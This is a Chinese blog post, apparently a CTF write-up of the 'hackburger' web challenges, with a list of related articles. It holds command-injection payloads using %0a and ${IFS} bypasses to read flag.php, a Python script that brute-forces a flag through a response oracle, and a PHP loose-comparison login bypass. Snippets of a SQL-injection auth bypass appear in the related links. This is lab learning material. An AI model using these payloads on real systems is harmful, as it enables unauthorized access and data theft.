hackburger

最新推荐文章于 2019-09-13 18:36:44 发布
最新推荐文章于 2019-09-13 18:36:44 发布
阅读量320 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_38094687/article/details/79859982
版权

hackburger Writeups

一共10道web题,非常有意思: 入口

详见本人的静态博客文章
部分题目思路来自CodeMonster大佬的博客,在此谢过.

Warmup

猜测是命令执行,用%0a做换行操作。
这里列一下绕过空格的技巧${IFS} 或者 <>

127.0.0.1%0als

可以看到:
cat

127.0.0.1%0acat index.php

index
获取源码,发现没做任何过滤
最后通过

127.0.0.1%0acat flag.php

获得flag

题目有一个输入框,输入f _等各种字符 有机会出现flag.txt,
猜测是通过字符串回显判断文件具体内容
附上脚本:

import requests
import sys
import string
url = 'http://burger.laboratorium.ee:8004/'
password = '_1234567890'+string.letters #Chars
ans = '_'
flag = 0
proxies = {
    'http':None,
    'https':None
}
x = ''  #_1234567890abcdefghilstxABCDEFGHILSTX  看出来对大小写不敏感
def getChar(x):
    for i in password:
        r = requests.post(url,data={'query':i},proxies=proxies)
        if 'flag.txt' in r.text:
            x = x+i
    print x
def right(ans):
    for j in x:
        payload = ans + j
        data={'query':payload}
        r = requests.post(url,data=data,proxies=proxies)
        if 'flag.txt' in r.text and payload != 'flag.txt':
            return ans + j
    return -1
def left(ans):
    for t in x:
        payload = t + ans
        data={'query':payload}
        r = requests.post(url,data=data,proxies=proxies)
        if 'flag.txt' in r.text and payload != 'flag.txt':
            return t + ans 
    return -1
def solve(ans,flag):
    for i in range(0,50):
        if flag == 0:
            if right(ans) == -1:
                flag = 1
            else:
                ans = right(ans)
        else :
            if left(ans) == -1:
                exit()
            else:
                ans = left(ans)
        print ans
        sys.stdout.flush()

if __name__=='__main__':
    getChar(x)
    solve(ans,flag)
#t_h_e__f_l_a_g__i_s__4401ac27ffff3318dc0f6a3de050b4169e2eba97

emmmmmmm对大小写不敏感
结果:
flag

Enter password to get candy

这题就是php中的字符串和0的弱比较问题
搭建本地环境:

<?php 
$a = 0;
$b = "flag?";
if($a==$b){
    echo "true";
}else{
    echo "flase";
}

?>

运行的结果当然是:

test

改一下post的数据

data="{"password":0}"

即可得到flag:

flag

待续

黑羽re
关注
专栏目录
hackthis攻略(Coding Level)
qq_28719743的博客
08-31 502
Coding Level 1 要我们排个序,限时5秒,所以我们得写个程序来实现 用python写个脚本就好了 import requests, re # 创建session对象 r = requests.session() postdata = {'username': '****', 'password': '****'} # 我使用了代理,这个可以看情况...
127.0.0.1和localhost和本机IP三者的区别!!!
L未若的博客
04-30 12万+
1,什么是环回地址??与127.0.0.1的区别呢?? 环回地址是主机用于向自身发送通信的一个特殊地址(也就是一个特殊的目的地址)。 可以这么说:同一台主机上的两项服务若使用环回地址而非分配的主机地址,就可以绕开TCP/IP协议栈的下层。(也就是说:不用再通过什么链路层,物理
IP地址和socket小知识-转自CSDN
lishl_engineer的专栏
11-24 738
<br />转载地址:http://topic.csdn.net/u/20090630/13/f3c5c6cc-020c-48ac-b1b7-df73820746ab.html?33795<br />虽然不是每个人都要做网络工程师,但开发人员的日常工作中,没有哪个不曾接触IP,<br />我碰到过好多新手在IP上犯迷糊,总结一下。<br /><br />IP地址的记法:<br />IP地址由四个字节构成,为了方便阅读和书写,每个字节用0-255的数字表示,字节之间用'.'分割,如:<br />10.10.1
0.0.0.0 与 127.0.0.1的区别
weixin_33840661的博客
01-07 2162
0.0.0.0 与 127.0.0.1的区别 一、总结 一句话总结: a、0.0.0.0:它表示的是这样一个集合:所有不清楚的主机和目的网络。 b、255.255.255.255:限制广播地址,这个地址不能被路由器转发。 c、127.0.0.1:本机地址,在Windows系统中,这个地址有一个别名“Localhost”。 二、0.0.0.0 与 127.0.0.1的区...
ping 127.0.0.1 一般故障
liangyifan的专栏
08-06 1万+
今天flash连接不上本地socket网络,觉得haoqit
localhost与127.0.0.1的区别
热门推荐
上善若水,水善利万物而不争。
12-18 13万+
localhost与127.0.0.1的区别是什么? 相信有人会说是本地ip,曾有人说,用127.0.0.1比localhost好,可以减少一次解析。 看来这个入门问题还有人不清楚,其实这两者是有区别的。 localhost也叫local ,正确的解释是:本地服务器 127.0.0.1在windows等系统的正确解释是:本机地址(本机服务器) localhot(local)是不经网卡传输
IP:127.0.0.1详解,与localhost区别
Walker_zmc的博客
01-25 1万+
127.0.0.1         127.0.0.1是回送地址,指本地机,一般用来测试使用。回送地址(127.x.x.x)是本机回送地址(Loopback Address),即主机IP堆栈内部的IP地址,主要用于网络软件测试以及本地机进程间通信,无论什么程序,一旦使用回送地址发送数据,协议软件立即返回,不进行任何网络传输。         IP地址由两个部分组成,即网络地址和主机地址。网络地...
(黑客游戏)HackTheGame1.21 过关攻略
系统运维
08-01 1706
第一关: 标题:您好 来自:chaozz@fake-mail-address.com ---------------------------------------------------------- 您好hahaya, 我对你寄予很高的期望,您的计算机技能远高于 正常水平,所以我猜你至少可以过2关. 您的第一...
网络抓包工具抓取本地环回接口127.0.0.1的数据包
lionzl的专栏
01-02 3429
网络抓包工具抓取本地环回接口127.0.0.1的数据包 (2011-07-24 00:35:39) 转载▼ 标签: it   1. 使用wireshark无法抓取本地环回接口127.0.0.1的数据包:   Windows TCP/IP stack does not implement a network loopbackin
Hackme-Web-wp
qq_41509200的博客
09-13 2131
Hackme-Web-wp 背景: 这几天老师要求我们把hackme的题目做出来,于是便开始了新的征程,一定把全部flag找出来,fighting… 题目及解题思路 1、hide and seek Can you see me? I’m so close to you but you can’t see me. 题目描述说离我很近,于是便翻翻网页源代码,果真发现了flag FLAG{0h U...
localhost,127.0.0.1 和 本机IP 三者的区别
Albert
10-25 2495
1、localhost首先是一个域名(如同:www.baidu.com),这个你打开本机的hosts文件就可以看到,一般位于c:\windows\system32\driver\etc下,一般在最后有这么一行:127.0.0.1 localhost  也是本机地址,它可以被配置为任意的IP地址(也就是说,可以通过hosts这个文件进行更改的),不过通常情况下都指向:(如下)IPv4
127.0.0.1和localhost的区别
zhandoushi的专栏
05-11 2143
    要比较两个东西有什么不同,首先要弄清两者的概念。所以,我们从概念开始。localhost:也叫local ,正确的解释是:本地服务器127.0.0.1:在windows等系统的正确解释是:本机地址(本机服务器)    我们再看看他们的工作原理。localhost:是不经网卡传输的,它不受网络防火墙和网卡相关的的限制。127.0.0.1:是通过网卡传输的,它依赖网卡,并受到网络防火墙和网卡相...
为什么网站访问跳转到127.0.0.1 求解决办法!!!!
IT技术宅-北方的刀郎
03-21 2万+
1.PING 一下看解析正确没有?看看有没有解析到指定的服务器ip2.站内墙把dns查询记录改了,回给你了个假的地址127.0.0.1 你自己改下host就ok 3.ok解决了,火狐的缓存出点问题Tracert 命令使用用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由.其命令格式如下:tracert [-d] [-h maximum_hops] [-
hack the box (web)
m0_38094687的博客
04-08 5418
接下来是2道web水题,来自hack the box。这个网站还真是厉害啊,邀请码要靠自己破解网页的一个小trick。话不多说看题。 - Cartographer (30) - HDC (30) Cartographer sql注入大水题 使用username='='&amp;amp;password='='的方式绕过 访问一下info=flag即可得到 HDC 这题...
2018安恒5月赛(web)
m0_38094687的博客
05-21 2198
前言 实训期间难得的2天假期,考虑到自身实力的不足,还暂时无法融入大队伍. 抓紧练习.期待大佬们RCTF发挥出色. 正文 web1 奇怪的恐龙特性 给了源码: &amp;amp;amp;amp;amp;lt;?php highlight_file(__FILE__); ini_set(&amp;amp;amp;amp;quot;display_error&amp;amp;amp;amp;quot;, false); error_reporting(0); $str
CTFlearn.writeup(web)
m0_38094687的博客
04-27 1310
CTFlean writeups(web) CTFlearn平台 Basic Injection payload: 1' or 1# POST practice 右键源码: &lt;!-- username: admin | password: 71urlkufpsdnlkadsf --&gt; post提交即可 Don’t Bump Your Head(er)...
初遇z3并与starCTF碰面
m0_38094687的博客
04-27 724
z3的初次使用与*CTF的web题解 z3的介绍与使用 介绍 Z3 是一个微软出品的开源约束求解器,能够解决很多种情况下的给定部分约束条件寻求一组满足条件的解的问题.在CTF中的应用主要在CRYPTO上. 安装 pip安装:pip install z3 如果发现安装了用不了,可以使用pip install z3-solver 使用 from z3 import ...
N1CTF+BCTF(3道sql注入)
m0_38094687的博客
04-28 466
前言 三道sql注入题,涨姿势. 正文 77777 题目及分析 部分代码审计,实际上就是要对hi进行bool盲注,如果分数更新了,就说明注入为真. 解题脚本 #hi = where ord(mid((select group_concat(user())), 1, 1)) &gt; 0 &amp;flag=55553 import requests url =...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值